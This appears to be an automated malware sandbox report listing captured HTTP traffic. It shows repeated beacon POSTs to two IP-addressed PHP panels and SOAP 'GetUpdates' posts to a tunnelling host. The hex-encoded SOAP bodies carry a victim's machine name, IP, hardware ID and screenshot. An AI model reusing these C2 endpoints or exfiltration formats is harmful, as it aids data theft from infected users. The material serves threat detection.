Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 95714Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 95713Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 95714Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-AliveData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 75 73 65 72 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 43 69 74 79 3e 55 4e 4b 4e 4f 57 4e 3c 2f 61 3a 43 69 74 79 3e 3c 61 3a 43 6f 75 6e 74 72 79 3e 55 53 3c 2f 61 3a 43 6f 75 6e 74 72 79 3e 3c 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 31 30 30 30 31 38 38 30 30 31 5c 62 75 69 6c 64 31 32 2e 65 78 65 3c 2f 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 3c 61 3a 48 61 72 64 77 61 72 65 3e 39 46 31 39 36 42 34 39 37 42 44 46 44 30 43 45 44 38 33 32 44 34 41 42 38 41 41 43 33 42 34 46 3c 2f 61 3a 48 61 72 64 77 61 72 65 3e 3c 61 3a 49 50 76 34 3e 38 31 2e 31 38 31 2e 35 37 2e 35 32 3c 2f 61 3a 49 50 76 34 3e 3c 61 3a 4c 61 6e 67 75 61 67 65 3e 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 3c 2f 61 3a 4c 61 6e 67 75 61 67 65 3e 3c 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 61 6c 66 6f 6e 73 3c 2f 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 3c 61 3a 4d 6f 6e 69 74 6f 72 3e 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 42 51 41 41 41 41 51 41 43 41 59 41 41 41 43 2b 6b 2f 52 44 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 41 52 6e 51 55 31 42 41 41 43 78 6a 77 76 38 59 51 55 41 41 41 41 4a 63 45 68 5a 63 77 41 41 44 73 4d 41 41 41 37 44 41 63 64 76 71 47 51 41 41 4b 4e 63 53 55 52 42 56 48 68 65 37 50 31 2f 65 42 7a 33 66 65 42 35 37 68 39 33 74 33 76 6e 5a 35 37 64 6d 39 76 62 33 64 6c 6e 62 37 6d 36 33 5a 32 39 33 4d 37 74 62 76 59 77 73 35 37 6c 2f 76 41 6f 48 74 73 38 61 31 65 30 4d 78 6b 34 6b 59 53 4d 6e 46 43 32 4d 34 77 63 6d 35 62 74 51 46 46 69 4a 4a 62 43 53 4c 49 74 78 54 4b 63 52 4d 4c 45 69 65 69 78 45 6c 69 79 41 74 6b 5a 67 34 6b 74 57 42 61 44 53 45 34 67 55 68 59 6b 57 59 52 2b 67 70 5a 6f 79 42 51 46 6b 52 4c 42 58 2f 70 63 66 61 75 71 67 65 35 47 6f 51 43 51 41 49 6c 75 76 74 37 50 38 35 6f 49 36 4f 37 71 71 75 71 47 35 50 70 4d 56 66 65 2f 46 5a 49 6b 53 5a 49 6b 53 5a 4b 36 4e 67 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 95713Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-AliveData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 75 73 65 72 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 43 69 74 79 3e 55 4e 4b 4e 4f 57 4e 3c 2f 61 3a 43 69 74 79 3e 3c 61 3a 43 6f 75 6e 74 72 79 3e 55 53 3c 2f 61 3a 43 6f 75 6e 74 72 79 3e 3c 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 31 30 30 30 31 38 37 30 30 31 5c 62 75 69 6c 64 31 32 2e 65 78 65 3c 2f 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 3c 61 3a 48 61 72 64 77 61 72 65 3e 39 46 31 39 36 42 34 39 37 42 44 46 44 30 43 45 44 38 33 32 44 34 41 42 38 41 41 43 33 42 34 46 3c 2f 61 3a 48 61 72 64 77 61 72 65 3e 3c 61 3a 49 50 76 34 3e 38 31 2e 31 38 31 2e 35 37 2e 35 32 3c 2f 61 3a 49 50 76 34 3e 3c 61 3a 4c 61 6e 67 75 61 67 65 3e 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 3c 2f 61 3a 4c 61 6e 67 75 61 67 65 3e 3c 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 61 6c 66 6f 6e 73 3c 2f 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 3c 61 3a 4d 6f 6e 69 74 6f 72 3e 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 42 51 41 41 41 41 51 41 43 41 59 41 41 41 43 2b 6b 2f 52 44 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 41 52 6e 51 55 31 42 41 41 43 78 6a 77 76 38 59 51 55 41 41 41 41 4a 63 45 68 5a 63 77 41 41 44 73 4d 41 41 41 37 44 41 63 64 76 71 47 51 41 41 4b 4e 63 53 55 52 42 56 48 68 65 37 50 31 2f 65 42 7a 33 66 65 42 35 37 68 39 33 74 33 76 6e 5a 35 37 64 6d 39 76 62 33 64 6c 6e 62 37 6d 36 33 5a 32 39 33 4d 37 74 62 76 59 77 73 35 37 6c 2f 76 41 6f 48 74 73 38 61 31 65 30 4d 78 6b 34 6b 59 53 4d 6e 46 43 32 4d 34 77 63 6d 35 62 74 51 46 46 69 4a 4a 62 43 53 4c 49 74 78 54 4b 63 52 4d 4c 45 69 65 69 78 45 6c 69 79 41 74 6b 5a 67 34 6b 74 57 42 61 44 53 45 34 67 55 68 59 6b 57 59 52 2b 67 70 5a 6f 79 42 51 46 6b 52 4c 42 58 2f 70 63 66 61 75 71 67 65 35 47 6f 51 43 51 41 49 6c 75 76 74 37 50 38 35 6f 49 36 4f 37 71 71 75 71 47 35 50 70 4d 56 66 65 2f 46 5a 49 6b 53 5a 49 6b 53 5a 4b 36 4e 67 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
